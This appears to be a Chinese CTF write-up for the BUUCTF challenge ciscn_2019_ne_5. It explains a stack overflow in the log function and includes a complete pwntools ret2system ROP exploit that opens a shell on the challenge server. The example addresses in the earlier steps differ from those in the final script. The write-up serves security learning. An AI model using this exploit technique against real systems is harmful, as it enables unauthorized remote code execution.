buu-ciscn_2019_ne_5-好久不见50

1. 背景分析

目标程序是一个存在漏洞的二进制文件,我们可以通过以下方式利用漏洞获取 shell:

  1. 程序中存在 system() 函数,但没有明显的 /bin/sh 字符串。

  2. 使用工具(如 ROPgadget)发现程序中有 sh 字符串,可以利用它作为 system() 的参数。

  3. 程序的交互逻辑需要先输入密码,然后选择操作,最后通过溢出漏洞触发 ROP 链。

2. 具体步骤
步骤 1:确定偏移量

通过分析程序的漏洞点(例如通过格式化字符串漏洞或堆溢出漏洞),找到可以覆盖返回地址的偏移量。假设偏移量为 0x48 + 4

步骤 2:查找关键地址

使用工具(如 ROPgadgetIDA Pro)查找以下地址:

  • system() 函数的地址。

  • main() 函数的地址(用于防止程序崩溃)。

  • sh 字符串的地址。

示例命令:

bash复制

复制代码
ROPgadget --binary ./zzz --search "system"
ROPgadget --binary ./zzz --search "sh"

假设:

  • system() 的地址为 0x08048430

  • main() 的地址为 0x08048500

  • sh 的地址为 0x08048123

步骤 3:交互流程

程序的交互逻辑如下:

  1. 程序提示输入管理员密码。

  2. 程序提供选项,需要选择 1 添加 log。

  3. 程序提示输入新的 log,此时发送构造的 ROP 链。

  4. 再次选择操作,选择 4 触发漏洞。

步骤 4:构造 ROP 链

根据上述地址和偏移量,构造 ROP 链:

  1. 填充到返回地址的偏移量。

  2. 覆盖返回地址为 system() 的地址。

  3. system() 返回后跳转到 main(),防止程序崩溃。

  4. sh 的地址作为 system() 的参数。

步骤 5:发送 ROP 链并触发漏洞

通过网络交互,发送构造的 ROP 链,并触发漏洞。

第一个条件s1 == 'administrator'

ADDLog():我们看到这里是输入log,跟我们的flag有关系

a1是我们外面传进来的src = 48,读取128个就造成了溢出

复制代码
from pwn import *
 
context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./zzz')
 
def main():
	if content == 1:
		p = process('zzz')
	else:
		p =remote('node5.buuoj.cn',25739)
	 
	#0x080482ea : sh
	sh_addr     = 0x080482ea
	system_addr = elf.sym['system']
	payload     = b'a' * (0x48+0x4) + p32(system_addr) + b'aaaa' + p32(sh_addr)
	
	p.sendlineafter("Please input admin password:",'administrator')
	p.sendlineafter("0.Exit\n:",'1')
	p.sendlineafter("Please input new log info:",payload)
	p.sendlineafter("0.Exit\n:",'4')
	
	p.interactive()
main()
相关推荐
智驱力人工智能1 小时前
从人海战术到智能巡逻 城市街道违规占道AI识别系统的实践与思考 占道经营检测系统价格 占道经营AI预警系统
人工智能·安全·yolo·目标检测·无人机·边缘计算
Bug.ink1 小时前
BUUCTF——WEB(2)
数据库·sql·网络安全·buuctf
网硕互联的小客服2 小时前
Centos系统如何更改root账户用户名?需要注意什么?
linux·运维·服务器·数据库·安全
xixixi777773 小时前
STIX/TAXII:网络威胁情报的“普通话”与“顺丰快递”
开发语言·安全·php·威胁·攻击检测·stix·taxii
Bruce_Liuxiaowei4 小时前
全面TCP端口扫描:Nmap高级扫描技术与实战应用
网络·tcp/ip·网络安全·php
网硕互联的小客服4 小时前
遇到网站500内部服务器错误如何处理?如何预防这样的问题发生?
运维·服务器·安全
emma羊羊4 小时前
【Yakit渗透利器】
安全·web安全
小阿宁的猫猫4 小时前
CSRF漏洞的原理、防御和比赛中的运用
安全·http·xss·csrf
晚烛4 小时前
实战前瞻:构建高安全、强协同的 Flutter + OpenHarmony 智慧金融移动银行平台(支持国产密码体系、生物认证与信创全栈适配)
安全·flutter·金融
sonadorje5 小时前
ECC公钥生成过程
算法·安全